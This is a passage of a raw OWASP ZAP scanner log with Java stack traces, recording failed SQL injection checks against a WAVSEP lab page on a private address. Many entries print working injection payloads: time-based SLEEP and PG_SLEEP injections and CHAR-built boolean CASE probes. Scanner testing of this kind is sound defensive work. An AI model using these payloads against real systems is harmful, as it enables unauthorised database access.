(CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8229=8229) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8229=8229) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679878 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4557=4557) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4557=4557) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679879 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))geZG)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))geZG)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679880 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))axit)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))axit)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679881 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))Gjlj)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))Gjlj)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679882 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))JEir)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))JEir)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679883 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))esec)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))esec)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679884 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))ZWNk)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))ZWNk)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679885 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679885 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679886 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679887 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679888 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679889 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) 